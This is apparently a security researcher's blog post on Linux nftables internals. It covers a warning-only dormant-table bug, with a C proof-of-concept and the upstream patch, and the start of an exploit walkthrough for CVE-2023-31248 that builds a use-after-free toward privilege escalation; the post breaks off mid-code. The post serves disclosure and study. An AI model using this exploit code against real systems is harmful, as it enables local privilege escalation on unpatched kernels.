During my internship, I have been researching and trying to find bugs within the nftables subsystem. In this blog post, I will talk about a bug I have found, as well as the exploitation of an n-day discovered by Mingi Cho – CVE-2023-31248.
nftables is a modern packet filtering framework that aims to replace the legacy {ip,ip6,arp,eb}_tables (xtables) infrastructure. It reuses the existing netfilter hooks, which act as entry points for handlers that perform various operations on packets. Nftables table objects contain a list of chain objects, which contain a list of rule objects, which finally contain expressions, which perform the operations of the pseudo-state machine.
Tables are top-level objects which contain chains, sets, objects and flowtables. Internally, tables are represented by struct nft_table
.
/**
* struct nft_table - nf_tables table
*
* @list: used internally
* @chains_ht: chains in the table
* @chains: same, for stable walks
* @sets: sets in the table
* @objects: stateful objects in the table
* @flowtables: flow tables in the table
* @hgenerator: handle generator state
* @handle: table handle
* @use: number of chain references to this table
* @family: 6-bit field; presumably the address family of the table -- TODO confirm
* @flags: table flag (see enum nft_table_flags)
* @genmask: generation mask
* @afinfo: address family info
*          (NOTE(review): no member named afinfo is declared in the struct below)
* @nlpid: NOTE(review): presumably the netlink port ID of the owning socket
*         (cf. NFT_TABLE_F_OWNER) -- TODO confirm
* @name: name of the table
* @udlen: presumably the length of @udata in bytes -- TODO confirm
* @udata: presumably user data attached to the table -- TODO confirm
* @validate_state: internal, set when transaction adds jumps
*/
struct nft_table {
struct list_head list;
struct rhltable chains_ht;
struct list_head chains;
struct list_head sets;
struct list_head objects;
struct list_head flowtables;
u64 hgenerator;
u64 handle;
u32 use;
/* family, flags and genmask share one u16: 6 + 8 + 2 = 16 bits */
u16 family:6,
flags:8,
genmask:2;
u32 nlpid;
char *name;
u16 udlen;
u8 *udata;
u8 validate_state;
};
A table can have multiple different flags. The user is able to set the flags NFT_TABLE_F_DORMANT
and/or NFT_TABLE_F_OWNER
when the table is created (nf_tables_newtable
). The dormant state flag (NFT_TABLE_F_DORMANT
) can be updated in nf_tables_updtable
. If NFT_TABLE_F_DORMANT
(0x1) is set, the table will be made dormant, and all its basechain hooks will be unregistered, but the table will not be deleted. There are also internally set __NFT_TABLE_F_UPDATE
flags, which comprise __NFT_TABLE_F_WAS_AWAKEN
and __NFT_TABLE_F_WAS_DORMANT
.
Chains can either be base chains, which are registered with a netfilter hook and cannot be jumped to, or normal chains, which are not registered with a hook but can be jumped to. Internally, chains are represented by struct nft_chain
.
/**
* struct nft_chain - nf_tables chain
*
* @blob_gen_0: RCU-protected rule blob pointer
*              (NOTE(review): presumably one blob per generation -- TODO confirm)
* @blob_gen_1: RCU-protected rule blob pointer (see @blob_gen_0)
* @rules: list of rules in the chain
* @list: used internally
* @rhlhead: used internally
* @table: table that this chain belongs to
* @handle: chain handle
* @use: number of jump references to this chain
* @flags: bitmask of enum nft_chain_flags
* @bound: 1-bit flag (NOTE(review): meaning not visible in this excerpt)
* @genmask: 2-bit generation mask
* @name: name of the chain
* @udlen: length of @udata
* @udata: separately allocated user data buffer
* @blob_next: only used during control plane commit phase
*/
struct nft_chain {
struct nft_rule_blob __rcu *blob_gen_0;
struct nft_rule_blob __rcu *blob_gen_1;
struct list_head rules;
struct list_head list;
struct rhlist_head rhlhead;
struct nft_table *table;
u64 handle;
u32 use;
/* flags, bound and genmask share one u8: 5 + 1 + 2 = 8 bits */
u8 flags:5,
bound:1,
genmask:2;
char *name;
u16 udlen;
u8 *udata;
/* Only used during control plane commit phase: */
struct nft_rule_blob *blob_next;
};
Basechains are represented by struct nft_base_chain
.
/**
* struct nft_base_chain - nf_tables base chain
*
* @ops: netfilter hook ops
* @hook_list: list of netfilter hooks (for NFPROTO_NETDEV family)
* @type: chain type
* @policy: default policy
* @flags: NOTE(review): not described in the original comment; meaning is not
*         visible in this excerpt
* @stats: per-cpu chain stats
* @chain: the chain
* @flow_block: flow block (for hardware offload)
*/
struct nft_base_chain {
struct nf_hook_ops ops;
struct list_head hook_list;
const struct nft_chain_type *type;
u8 policy;
u8 flags;
struct nft_stats __percpu *stats;
/* the generic chain is embedded by value, not referenced by pointer */
struct nft_chain chain;
struct flow_block flow_block;
};
Rules contain nftables expressions. Internally, rules are represented by struct nft_rule
.
/**
* struct nft_rule - nf_tables rule
*
* @list: used internally
* @handle: rule handle
* @genmask: generation mask
* @dlen: length of expression data
* @udata: user data is appended to the rule
* @data: expression data
*
* The four bitfields share a single u64 and use 42 + 2 + 12 + 1 = 57 of its
* bits. @dlen is 12 bits wide, so it can hold values up to 4095.
*/
struct nft_rule {
struct list_head list;
u64 handle:42,
genmask:2,
dlen:12,
udata:1;
/* flexible array member, aligned so a struct nft_expr can start at data[0] */
unsigned char data[]
__attribute__((aligned(__alignof__(struct nft_expr))));
};
Expressions act as the operations of the state machine. There are many expressions, here are some for example:
Internally, expressions are represented by struct nft_expr
.
/**
* struct nft_expr - nf_tables expression
*
* @ops: expression ops
* @data: expression private data
*
* @data is a flexible array member aligned to the alignment of u64; it
* directly follows the @ops pointer in memory.
*/
struct nft_expr {
const struct nft_expr_ops *ops;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};
Each expression also has a struct nft_expr_ops
representing various operations.
/**
* struct nft_expr_ops - nf_tables expression operations
*
* @eval: Expression evaluation function
* @size: full expression size, including private data size
* @init: initialization function
* @activate: activate expression in the next generation
* @deactivate: deactivate expression in next generation
* @destroy: destruction function, called after synchronize_rcu
* @dump: function to dump parameters
* @type: expression type
* @validate: validate expression, called during loop detection
* @data: extra data to attach to this expression operation
*
* NOTE(review): @clone, @destroy_clone, @reduce, @gc, @offload,
* @offload_action and @offload_stats are declared below but have no entry in
* this comment; their semantics are not visible in this excerpt.
*/
struct nft_expr_ops {
void (*eval)(const struct nft_expr *expr,
struct nft_regs *regs,
const struct nft_pktinfo *pkt);
int (*clone)(struct nft_expr *dst,
const struct nft_expr *src);
unsigned int size;
int (*init)(const struct nft_ctx *ctx,
const struct nft_expr *expr,
const struct nlattr * const tb[]);
void (*activate)(const struct nft_ctx *ctx,
const struct nft_expr *expr);
void (*deactivate)(const struct nft_ctx *ctx,
const struct nft_expr *expr,
enum nft_trans_phase phase);
void (*destroy)(const struct nft_ctx *ctx,
const struct nft_expr *expr);
void (*destroy_clone)(const struct nft_ctx *ctx,
const struct nft_expr *expr);
int (*dump)(struct sk_buff *skb,
const struct nft_expr *expr,
bool reset);
int (*validate)(const struct nft_ctx *ctx,
const struct nft_expr *expr,
const struct nft_data **data);
bool (*reduce)(struct nft_regs_track *track,
const struct nft_expr *expr);
bool (*gc)(struct net *net,
const struct nft_expr *expr);
int (*offload)(struct nft_offload_ctx *ctx,
struct nft_flow_rule *flow,
const struct nft_expr *expr);
bool (*offload_action)(const struct nft_expr *expr);
void (*offload_stats)(struct nft_expr *expr,
const struct flow_stats *stats);
const struct nft_expr_type *type;
void *data;
};
Many nftables objects have a 2 bit genmask, which specifies whether an object is active in the current and/or next generation. If a bit is set, the object is not active in that generation. There is an overall gencursor defining the bit that represents the current generation. Objects can have the following states:
In nftables, actions requested by userspace (via a netlink message) are performed in the control plane, which include functions such as nf_tables_newtable
, nf_tables_updtable
, nf_tables_newchain
and more. The control plane is in charge of the creation and allocation of objects, activating/deactivating objects in the next generation, linking objects, and modifying the “use” refcount of objects. However, newly created objects are not immediately activated after creation; they are only activated in the commit phase when a new generation is started. All actions in the control plane that involve the creation or updating of objects will add a new transaction to the transaction list.
When a netlink batch transaction is considered to be valid (i.e. all actions in the control plane do not return errors), the commit phase is entered and nf_tables_commit
is called. A new generation will be started, resulting in all newly created objects becoming active, and actions in the transaction list will be performed. The commit phase is also in charge of unlinking objects that are to be deleted, and queuing the asynchronous transaction worker in charge of destroying objects (nf_tables_trans_destroy_work
).
The asynchronous transaction worker, when run, will call nft_commit_release
, which will finally call functions that will destroy and free objects marked for deletion.
While researching nftables, through manual source code review, I was able to identify a bug that resulted in a warning splat. The bug report can be seen here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=c9bd26513b3a11b3adb3c2ed8a31a01a87173ff1
When a newly created table is updated via nf_tables_updtable
from active to dormant, the table flag is set to NFT_TABLE_F_DORMANT
, and as none of the __NFT_TABLE_F_UPDATE
flags are set, the __NFT_TABLE_F_WAS_AWAKEN
flag will be set. When updating a table from active to dormant, the chain hooks are not deactivated until nf_tables_commit
is called. However, when a table is updated from dormant to active, the NFT_TABLE_F_DORMANT
flag is unset. It then checks if any of the __NFT_TABLE_F_UPDATE
flags are set, and if none are set, the chain hooks are instantly activated by nf_tables_table_enable
(i.e. before nf_tables_commit
is called). This code behaviour can be seen below:
/*
 * Excerpt of the table-update path (elided parts are marked "..."): handles a
 * request to toggle NFT_TABLE_F_DORMANT on an existing table. "flags" holds
 * the flags requested by userspace; ctx->table->flags holds the current ones.
 */
static int nf_tables_updtable(struct nft_ctx *ctx) {
...
/*
 * Requested dormant, table currently not dormant: only the flag is set
 * here; no hook is touched in this branch.
 */
if ((flags & NFT_TABLE_F_DORMANT) &&
!(ctx->table->flags & NFT_TABLE_F_DORMANT)) {
ctx->table->flags |= NFT_TABLE_F_DORMANT;
/* remember the previous state only if no update flag is set yet */
if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE))
ctx->table->flags |= __NFT_TABLE_F_WAS_AWAKEN;
/* Requested not dormant, table currently dormant: clear the flag. */
} else if (!(flags & NFT_TABLE_F_DORMANT) &&
ctx->table->flags & NFT_TABLE_F_DORMANT) {
ctx->table->flags &= ~NFT_TABLE_F_DORMANT;
/*
 * nf_tables_table_enable() is called immediately, but only when no
 * __NFT_TABLE_F_UPDATE flag is already set; if one is set, the call
 * is skipped entirely.
 */
if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE)) {
ret = nf_tables_table_enable(ctx->net, ctx->table);
if (ret < 0)
goto err_register_hooks;
ctx->table->flags |= __NFT_TABLE_F_WAS_DORMANT;
}
}
...
}
It is possible to activate/deactivate tables in such a way that, at one point in time, some chains are registered and some are not. This can be done by updating an active table to dormant so that the __NFT_TABLE_F_WAS_AWAKEN
flag, which is one of the __NFT_TABLE_F_UPDATE
flags, is set, and then updating the dormant table to active. As one of the __NFT_TABLE_F_UPDATE
flags is set, nf_tables_table_enable
is skipped, leaving some chains unregistered. When an active table is deleted, nf_tables_unregister_hook
only checks if the NFT_TABLE_F_DORMANT
flag is zeroed out. If the flag is unset, all the base chains are assumed to be active and hence all the chain hooks will be deactivated, even if they are not registered in the first place. This causes the following warning to be displayed:
[ 1411.118307] ------------[ cut here ]------------
[ 1411.119665] hook not found, pf 2 num 3
[ 1411.119708] WARNING: CPU: 1 PID: 367 at net/netfilter/core.c:517 __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.124338] Modules linked in:
[ 1411.125549] CPU: 1 PID: 367 Comm: nft Not tainted 6.5.2 #2
[ 1411.127933] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 1411.130939] RIP: 0010:__nf_unregister_net_hook+0xf8/0x2e0
[ 1411.133576] Code: 01 00 0f 85 90 00 00 00 48 8b 3c 24 c6 05 a5 77 dd 01 01 e8 3a 49 fc fe 8b 53 1c 44 89 e6 48 c7 c7 e0 59 31 83 e8 c8 4c c1 fe <0f> 0b eb 6a 44 89 f8 48 c1 e0 04 4c 01 f0 48 8d 78 08 48 89 44 24
[ 1411.143107] RSP: 0018:ffff8880158f7388 EFLAGS: 00010282
[ 1411.145200] RAX: 0000000000000000 RBX: ffff888006c0f200 RCX: 0000000000000000
[ 1411.147892] RDX: 0000000000000002 RSI: ffffffff8114726f RDI: ffffffff85bd0200
[ 1411.150749] RBP: ffffffff85ffdac0 R08: 0000000000000001 R09: ffffed100da64f01
[ 1411.153231] R10: ffff88806d32780b R11: 0000000000000001 R12: 0000000000000002
[ 1411.156197] R13: ffff888007a4cab8 R14: ffff888007a4ca80 R15: 0000000000000002
[ 1411.159507] FS: 00007f03b7cd5d80(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000
[ 1411.162667] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1411.164773] CR2: 00007ffc14b40558 CR3: 0000000017ce8000 CR4: 00000000000006e0
[ 1411.169262] Call Trace:
[ 1411.171044] <TASK>
[ 1411.172713] ? __warn+0x9c/0x200
[ 1411.174282] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.176416] ? report_bug+0x1f2/0x220
[ 1411.177947] ? handle_bug+0x3c/0x80
[ 1411.179123] ? exc_invalid_op+0x13/0x40
[ 1411.180361] ? asm_exc_invalid_op+0x16/0x20
[ 1411.181887] ? preempt_count_sub+0xf/0xc0
[ 1411.183772] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.185357] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.187045] nf_tables_commit+0x1a15/0x2600
[ 1411.189373] ? __pfx___nla_validate_parse+0x20/0x20
[ 1411.191535] ? __pfx_lock_release+0x20/0x20
[ 1411.193486] ? __pfx_nf_tables_commit+0x20/0x20
[ 1411.195470] nfnetlink_rcv_batch+0x860/0x1100
[ 1411.197345] ? __pfx_nfnetlink_rcv_batch+0x20/0x20
[ 1411.199436] ? find_held_lock+0x83/0xa0
[ 1411.200948] nfnetlink_rcv+0x1da/0x220
[ 1411.202570] ? __pfx_nfnetlink_rcv+0x20/0x20
[ 1411.204341] ? netlink_deliver_tap+0xf7/0x5e0
[ 1411.206507] netlink_unicast+0x2ca/0x460
[ 1411.208166] ? __pfx_netlink_unicast+0x20/0x20
[ 1411.210278] ? __virt_addr_valid+0xd4/0x160
[ 1411.212405] netlink_sendmsg+0x3d5/0x700
[ 1411.214076] ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.215943] ? import_ubuf+0xc1/0x100
[ 1411.217517] ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.219358] sock_sendmsg+0xda/0xe0
[ 1411.220915] ? import_iovec+0x54/0x80
[ 1411.222655] ____sys_sendmsg+0x436/0x500
[ 1411.224223] ? __pfx_____sys_sendmsg+0x20/0x20
[ 1411.226046] ? __pfx_copy_msghdr_from_user+0x20/0x20
[ 1411.227928] ? sk_getsockopt+0xbc7/0x1b20
[ 1411.229274] ? find_held_lock+0x83/0xa0
[ 1411.230507] ___sys_sendmsg+0xf8/0x160
[ 1411.231712] ? __pfx____sys_sendmsg+0x20/0x20
[ 1411.233656] ? __pfx_sk_setsockopt+0x20/0x20
[ 1411.235285] ? sock_has_perm+0xc9/0x1a0
[ 1411.236601] ? __fget_light+0xda/0x100
[ 1411.238418] __sys_sendmsg+0xe5/0x180
[ 1411.240445] ? __pfx___sys_sendmsg+0x20/0x20
[ 1411.241861] ? __sys_getsockopt+0x17d/0x1a0
[ 1411.243273] ? syscall_enter_from_user_mode+0x1c/0x60
[ 1411.244890] do_syscall_64+0x3a/0xa0
[ 1411.246060] entry_SYSCALL_64_after_hwframe+0x6e/0xd8
This bug was introduced in the following commit: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=179d9ba5559a756f4322583388b3213fe4e391b0
To trigger the bug, the following steps should be taken (in the same batch transaction):
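1. Create an active table "test_table" [1].
2. Update the table from active to dormant [2]. The NFT_TABLE_F_DORMANT and __NFT_TABLE_F_WAS_AWAKEN table flags are set.
3. Add a basechain "chain1" to the dormant table [3]. The basechain is not registered.
4. Update the table from dormant to active [4]. The NFT_TABLE_F_DORMANT flag is zeroed out, but the __NFT_TABLE_F_WAS_AWAKEN flag is still set, causing nf_tables_table_enable to be skipped.
5. Delete the active table with "nft delete table test_table" [5].
The table is active when it is deleted, so when the table is being flushed, all the basechains are treated as registered and will be unregistered. However, as basechain “chain1” was never registered, the kernel will try to unregister an unregistered chain, causing a warning.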
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <stddef.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <time.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>
#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
/*
 * Hook parameters that turn a chain into a base chain. build_chain() copies
 * them into the NFTNL_CHAIN_HOOKNUM and NFTNL_CHAIN_PRIO attributes.
 */
struct unft_base_chain_param {
uint32_t hook_num; /* netfilter hook number, e.g. NF_INET_LOCAL_OUT */
uint32_t prio; /* chain priority */
};
/*
 * Allocate an nftnl table object and set its family and name.
 *
 * @name:   table name, stored in NFTNL_TABLE_NAME
 * @family: value stored in NFTNL_TABLE_FAMILY (e.g. NFPROTO_IPV4)
 *
 * Returns the new table; the caller owns it and releases it with
 * nftnl_table_free(). The process exits if the allocation fails, so the
 * return value is never NULL.
 */
struct nftnl_table* build_table(char* name, uint16_t family) {
    struct nftnl_table *t = nftnl_table_alloc();

    /* Without this check the setters below would dereference NULL. */
    if (t == NULL) {
        perror("nftnl_table_alloc");
        exit(EXIT_FAILURE);
    }

    nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family);
    nftnl_table_set_str(t, NFTNL_TABLE_NAME, name);
    return t;
}
/*
 * Allocate an nftnl chain object and fill in its attributes.
 *
 * @table_name: name of the table the chain belongs to (NFTNL_CHAIN_TABLE)
 * @chain_name: name of the chain (NFTNL_CHAIN_NAME)
 * @base_param: when non-NULL, its hook number and priority are set on the
 *              chain (NFTNL_CHAIN_HOOKNUM / NFTNL_CHAIN_PRIO); pass NULL to
 *              leave both attributes unset
 * @chain_id:   when non-zero, stored in NFTNL_CHAIN_ID; 0 leaves the
 *              attribute unset
 *
 * Returns the new chain; the caller owns it and releases it with
 * nftnl_chain_free(). The process exits if the allocation fails, so the
 * return value is never NULL.
 */
struct nftnl_chain* build_chain(char* table_name, char* chain_name, struct unft_base_chain_param* base_param, uint32_t chain_id) {
    struct nftnl_chain *c = nftnl_chain_alloc();

    /* Without this check the setters below would dereference NULL. */
    if (c == NULL) {
        perror("nftnl_chain_alloc");
        exit(EXIT_FAILURE);
    }

    nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);
    nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);

    if (base_param) {
        nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num);
        nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio);
    }

    if (chain_id) {
        nftnl_chain_set_u32(c, NFTNL_CHAIN_ID, chain_id);
    }

    return c;
}
/*
 * Proof of concept for the dormant-flag toggle warning.
 *
 * Sends a single netlink batch that creates table "test_table", makes it
 * dormant, adds base chain "chain1", and makes the table active again. It
 * then deletes the table through the nft command-line tool, which is the
 * step that triggers the warning.
 *
 * Returns 0 on success; exits with EXIT_FAILURE if the netlink socket cannot
 * be set up or the batch cannot be sent.
 */
int main(void) {
    char buf[MNL_SOCKET_BUFFER_SIZE];
    struct nlmsghdr *nlh;
    struct mnl_nlmsg_batch *batch;
    ssize_t ret;
    uint32_t seq = (uint32_t)time(NULL);
    uint8_t family = NFPROTO_IPV4;

    struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
    if (nl == NULL) {
        perror("mnl_socket_open");
        exit(EXIT_FAILURE);
    }
    if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
        perror("mnl_socket_bind");
        exit(EXIT_FAILURE);
    }

    // Start nl message
    batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
    if (batch == NULL) {
        perror("mnl_nlmsg_batch_start");
        exit(EXIT_FAILURE);
    }
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    // Create active table "test_table" [1]
    struct nftnl_table * t = build_table("test_table", NFPROTO_IPV4);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_nlmsg_build_payload(nlh, t);
    mnl_nlmsg_batch_next(batch);

    // Update table "test_table" -- table is now dormant [2]
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x1);
    nftnl_table_nlmsg_build_payload(nlh, t);
    mnl_nlmsg_batch_next(batch);

    // Add basechain "chain1" -- not registered [3]
    struct unft_base_chain_param bp2;
    bp2.hook_num = NF_INET_LOCAL_OUT;
    bp2.prio = 11;
    struct nftnl_chain * c = build_chain("test_table", "chain1", &bp2, 11);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_chain_nlmsg_build_payload(nlh, c);
    mnl_nlmsg_batch_next(batch);

    // Update table "test_table" -- table is now active [4]
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x0);
    nftnl_table_nlmsg_build_payload(nlh, t);
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    // Send netlink message
    printf("[+] Sending netlink message 1\n");
    ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch));
    if (ret == -1) {
        /* Nothing was sent, so the delete below could not trigger anything. */
        perror("mnl_socket_sendto");
        exit(EXIT_FAILURE);
    }
    mnl_nlmsg_batch_stop(batch);

    /* The payloads were copied into buf; the builder objects are done. */
    nftnl_chain_free(c);
    nftnl_table_free(t);
    mnl_socket_close(nl);

    // Trigger warning [5]
    if (system("nft delete table test_table") == -1) {
        perror("system");
    }
    return 0;
}
Unfortunately (actually fortunately), the bug is unexploitable as we are unable to reach any interesting frees. For filter/route hooks, nf_remove_net_hook
will fail and result in the warning, and for NAT hooks, nat_proto_net->users == 0
, resulting in another warning, preventing us from reaching the free.
To patch the bug, the developers decided that it was best to prevent toggling the dormant state more than once in a single batch transaction. I guess the tables were not meant to be updated…periodically ;)
diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index d819b4d429624..a3680638ec60f 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -1219,6 +1219,10 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
flags & NFT_TABLE_F_OWNER))
return -EOPNOTSUPP;
+ /* No dormant off/on/off/on games in single transaction */
+ if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
+ return -EINVAL;
+
trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE,
sizeof(struct nft_trans_table));
if (trans == NULL)
If the update flag was previously set (by toggling the dormant state previously in the same batch transaction), nf_tables_updtable
will simply fail.
Other than trying to find new bugs, I also conducted n-day research on CVE-2023-31248, which was discovered by Mingi Cho. The bug report and patch can be found here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=515ad530795c118f012539ed76d02bacfd426d89
Linux kernel versions before 6.2.0-26 generic are vulnerable to this bug. The exploit has been tested on Ubuntu 23.04 (Lunar Lobster), with kernel version 6.2.0-20 generic.
nft_chain_lookup_byid
does not check whether a chain is active (by checking the genmask) when looking up a chain, as seen in the code below:
/*
 * Look up a chain by the transaction-local chain ID carried in @nla.
 *
 * Walks the pending transactions on the per-netns commit_list and returns the
 * chain of the first NFT_MSG_NEWCHAIN transaction that belongs to @table and
 * whose chain ID matches. Returns ERR_PTR(-ENOENT) when nothing matches.
 *
 * Note that the match does not look at the chain's genmask, so a chain whose
 * NFT_MSG_NEWCHAIN transaction is still on the list is returned regardless of
 * whether it is active.
 */
static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
const struct nft_table *table,
const struct nlattr *nla)
{
struct nftables_pernet *nft_net = nft_pernet(net);
/* the ID arrives big-endian in the attribute */
u32 id = ntohl(nla_get_be32(nla));
struct nft_trans *trans;
list_for_each_entry(trans, &nft_net->commit_list, list) {
struct nft_chain *chain = trans->ctx.chain;
/* only message type, owning table and ID are compared */
if (trans->msg_type == NFT_MSG_NEWCHAIN &&
chain->table == table &&
id == nft_trans_chain_id(trans))
return chain;
}
return ERR_PTR(-ENOENT);
}
When adding a rule that refers to a chain by its ID, if that chain had been deleted in the same batch, it is possible to refer to an inactive chain. The later destruction of the deleted chain then fails because the value of chain->use is not 0, resulting in a warning being displayed.
To trigger the bug, a batch transaction can be sent comprising of the following steps:
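1. Create a table (NFT_MSG_NEWTABLE)
2. Create a chain, chain1 (NFT_MSG_NEWCHAIN)
3. Delete chain1 (NFT_MSG_DELCHAIN)
4. Create another chain, chain2 (NFT_MSG_NEWCHAIN)
5. Create a rule in chain2 that refers to chain1 by its chain ID (NFT_MSG_NEWRULE)
When the new rule is created, the following code path is taken such that the value of chain->use for the destination chain (chain1) is incremented from 0 to 1. This is due to the fact that a new reference to chain1 is created.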
nf_tables_newrule
-> nf_tables_newexpr
-> nft_immediate_init
-> nft_data_init
-> nft_verdict_init
As all the actions in the batch transaction are determined to be valid, the batch transaction succeeds. When a valid batch transaction succeeds, nfnetlink_rcv_batch
calls the commit operation for nf_tables_subsys
, which is nf_tables_commit
.
Note that the struct nft_chain chain1
object is not immediately deleted when NFT_MSG_DELCHAIN
is received. For each action, a transaction is added to the list, and all the transactions are processed when commit is called. Destruction of deleted objects is then scheduled, and performed by a worker thread asynchronously. The following code path is then taken to destroy and free the chain1 object, which has been marked as inactive:
nf_tables_commit
-> nf_tables_commit_release
-> nf_tables_trans_destroy_work
-> nft_commit_release
-> nf_tables_chain_destroy
However, in this case, when nf_tables_chain_destroy
is reached, chain1 is not freed and a warning is displayed. This is because chain1’s chain->use is 1 and not 0 ([6]).
/*
 * Free the chain referenced by ctx->chain together with its rules, name and
 * user data. For a base chain the enclosing struct nft_base_chain is freed,
 * along with its hooks (netdev case) and per-cpu stats.
 *
 * If the chain is still referenced (chain->use > 0) the function warns and
 * returns without freeing anything.
 */
void nf_tables_chain_destroy(struct nft_ctx *ctx)
{
struct nft_chain *chain = ctx->chain;
struct nft_hook *hook, *next;
if (WARN_ON(chain->use > 0)) <-- [6]
return;
/* no concurrent access possible anymore */
nf_tables_chain_free_chain_rules(chain);
if (nft_is_base_chain(chain)) {
struct nft_base_chain *basechain = nft_base_chain(chain);
/* the hook list is only walked when nft_base_chain_netdev() is true */
if (nft_base_chain_netdev(ctx->family, basechain->ops.hooknum)) {
list_for_each_entry_safe(hook, next,
&basechain->hook_list, list) {
list_del_rcu(&hook->list);
kfree_rcu(hook, rcu);
}
}
module_put(basechain->type->owner);
if (rcu_access_pointer(basechain->stats)) {
static_branch_dec(&nft_counters_enabled);
free_percpu(rcu_dereference_raw(basechain->stats));
}
/* free order: name, udata, then the containing base chain object */
kfree(chain->name);
kfree(chain->udata);
kfree(basechain);
} else {
/* free order: name, udata, then the chain object itself */
kfree(chain->name);
kfree(chain->udata);
kfree(chain);
}
}
The first step to writing a successful privilege escalation exploit is obtaining a use-after-free primitive. Essentially, we need to find a way to decrease chain->use of the deleted chain to 0 so that when nf_tables_chain_destroy
is called, the chain object is freed. This can be done via exploiting the race condition between the control plane (nf_tables_delrule
) and the transaction worker (nf_tables_trans_destroy_work
).
In order to do this, 2 batch transactions were sent. In the first batch transaction, the following actions were performed:
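1. Create a table (NFT_MSG_NEWTABLE)
2. Create chain 1 (NFT_MSG_NEWCHAIN). The name of the chain is 20 characters long. This is the chain to be deleted.
3. Delete chain 1 (NFT_MSG_DELCHAIN)
4. Create chain 2 (NFT_MSG_NEWCHAIN)
5. Create a rule in chain 2 with an immediate goto verdict that refers to chain 1 by its chain ID (NFT_MSG_NEWRULE)
// Start nl message 1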
batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Create table
struct nftnl_table *t = build_table(table_name, NFPROTO_IPV4);
family = nftnl_table_get_u32(t, NFTNL_TABLE_FAMILY);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_nlmsg_build_payload(nlh, t);
nftnl_table_free(t);
mnl_nlmsg_batch_next(batch);
// Create chain 1
struct nftnl_chain *c = build_chain(table_name, chain_name, NULL, 0x1234);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c);
mnl_nlmsg_batch_next(batch);
// Delete chain 1
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c);
nftnl_chain_free(c);
mnl_nlmsg_batch_next(batch);
// Create chain 2
struct nftnl_chain *c2 = build_chain(table_name, "chain2", &bp, 10);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c2);
nftnl_chain_free(c2);
mnl_nlmsg_batch_next(batch);
// Create rule pointing to chain 1
